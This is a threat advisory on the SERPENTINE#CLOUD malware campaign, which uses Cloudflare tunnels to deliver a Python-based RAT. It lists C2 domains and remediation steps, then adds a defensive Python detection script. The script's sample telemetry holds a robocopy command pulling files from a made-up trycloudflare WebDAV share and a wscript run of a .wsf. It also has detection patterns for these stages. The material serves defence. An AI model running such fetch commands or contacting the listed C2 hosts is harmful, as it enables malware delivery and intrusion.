June 20, 2025
Severity
High
Analysis Summary
A sophisticated malware campaign dubbed SERPENTINE#CLOUD has emerged, exploiting Cloudflare’s tunneling service to stealthily deliver multi-stage Python-based malware. This operation marks a significant leap in cybercriminal tactics, leveraging legitimate cloud infrastructure, advanced evasion techniques, and social engineering to infiltrate organizations primarily across the US, UK, Germany, and parts of Europe and Asia. Initial access is achieved via phishing emails containing malicious .lnk (shortcut) files disguised as PDF documents, typically crafted around invoice themes to deceive business users. The campaign’s use of trycloudflare.com subdomains allows attackers to bypass conventional security filters by blending malicious traffic with legitimate Cloudflare usage.
According to the researchers, the infection chain is highly modular and layered. It begins with a disguised shortcut file that runs a command invoking the Windows robocopy utility to pull malicious payloads from WebDAV shares hosted on Cloudflare’s infrastructure. This step retrieves a .wsf (Windows Script File), which in turn executes a remote batch script fetched from a second Cloudflare tunnel. The multi-domain architecture and the use of native Windows tools significantly complicate detection and analysis. Each stage of the chain is designed to increase stealth and resilience, showing a deep understanding of system internals and security evasion techniques.
One of the most advanced components of the campaign is the batch file stage, which uses UTF-16LE encoding, variable obfuscation, and anti-AV checks to stay undetected. This stage also drops decoy PDF files to divert user suspicion, downloads complete Python environments, and sets up Windows startup folder persistence. The payloads are then used to run a Python-based shellcode loader that implements Early Bird APC injection, a stealthy method of injecting shellcode into memory without touching disk, enabling fileless persistence.
The final payload is a Donut-packed Remote Access Trojan (RAT) capable of stealing credentials, browser session data, and other sensitive information. The RAT maintains command-and-control communication via several domains, including nhvncpure.shop, nhvncpure.sbs, and dynamic DNS platforms such as DuckDNS. The campaign reflects nation-state-level sophistication, though attribution remains unclear. However, the English-language fluency in the code, the careful infrastructure selection, and the scalable delivery methods indicate a well-funded and capable adversary, possibly testing infrastructure for wider operations.
Impact
- Sensitive Information Theft
- Security Bypass
- Remote Access
- Gain Access
Indicators of Compromise
Domain Name
- nhvncpure.shop
- nhvncpure.sbs
- nhvncpure.click
- nhvncpureybs.duckdns.org
- nhvncpurekfl.duckdns.org
- ncmomenthv.duckdns.org
- hvncmomentpure.duckdns.org
- nhvncpure.twilightparadox.com
- nhvncpure1.strangled.net
IP
- 51.89.212.145
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Block unauthorized outbound traffic to Cloudflare Tunnel domains (e.g., trycloudflare.com).
- Monitor network traffic for suspicious use of Cloudflare binaries or unusual tunnel activity.
- Implement application allowlisting to prevent unauthorized execution of Python scripts and tunneling tools.
- Use endpoint detection and response (EDR) solutions to detect Python-based malware behavior.
- Regularly update antivirus and threat detection signatures to identify tunneling malware.
- Educate employees on phishing and social engineering tactics used to deliver initial payloads.
- Isolate and analyze suspicious Python scripts or binaries in a sandbox environment before execution.
- Implement strict access controls and privilege management on systems to limit lateral movement.
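To make the monitoring recommendations concrete, the following added example (not code from the advisory or from the researchers) runs simple detection rules over constructed DNS and process-creation telemetry. It flags the stages described above: lookups of the listed C2 domains or of trycloudflare.com / duckdns.org names, robocopy reading from a WebDAV (UNC) share, a script host running a .wsf, and Python launched from the Startup folder. Event field names, hostnames and paths are assumptions made for the example.

```python
import re

# Domains from this advisory's IOC list; trycloudflare.com and duckdns.org are the tunnel and dynamic-DNS services it names.
C2_DOMAINS = {"nhvncpure.shop", "nhvncpure.sbs", "nhvncpure.click"}
SUSPECT_SUFFIXES = (".trycloudflare.com", ".duckdns.org")
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)
UNC_RE = re.compile(r"\\\\[\w.-]+(?:@ssl)?(?:@\d+)?\\", re.I)   # \\host[@SSL][@port]\ (WebDAV-style UNC)

def check_dns(query):
    """Flag lookups of known C2 domains or of the tunnel/DDNS services used."""
    q = query.lower().rstrip(".")
    if q in C2_DOMAINS or any(q.endswith("." + d) for d in C2_DOMAINS):
        return "dns: known SERPENTINE#CLOUD C2 domain %s" % q
    for suf in SUSPECT_SUFFIXES:
        if q.endswith(suf):
            return "dns: lookup of %s via %s (tunnel/DDNS)" % (q, suf[1:])
    return None

def check_process(image, cmdline):
    """Flag the native-tool stages the report describes (robocopy, .wsf, Python)."""
    img, cl = image.lower().rsplit("\\", 1)[-1], cmdline.lower()
    if img == "robocopy.exe" and UNC_RE.search(cmdline):
        return "process: robocopy pulling from a WebDAV/UNC share"
    if img in ("wscript.exe", "cscript.exe") and ".wsf" in cl and ("\\users\\" in cl or UNC_RE.search(cmdline)):
        return "process: script host running a .wsf from a user or remote path"
    if img.startswith("python") and STARTUP_RE.search(cmdline):
        return "process: python launched from the Startup folder (persistence)"
    return None

def scan(events):
    """Run both checks over a list of event dicts; return (host, alert) pairs."""
    alerts = []
    for ev in events:
        hit = check_dns(ev["query"]) if ev["type"] == "dns" else check_process(ev["image"], ev["cmdline"])
        if hit:
            alerts.append((ev["host"], hit))
    return alerts

# Constructed sample telemetry (not real captures); hostnames and paths are made up.
SAMPLE = [
    {"type": "dns", "host": "ws01", "query": "www.microsoft.com"},
    {"type": "dns", "host": "ws01", "query": "quiet-river-example.trycloudflare.com"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy \\quiet-river-example.trycloudflare.com@SSL\DavWWWRoot\inv C:\Users\Public\tmp"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\tmp\invoice.wsf"},
    {"type": "process", "host": "ws02", "image": r"C:\Users\u\AppData\Local\python\python.exe",
     "cmdline": r"python.exe C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.py"},
]
```

Calling `scan(SAMPLE)` returns one alert per matching event; in production the rules would be fed from EDR or Sysmon process events and DNS logs rather than the inline sample.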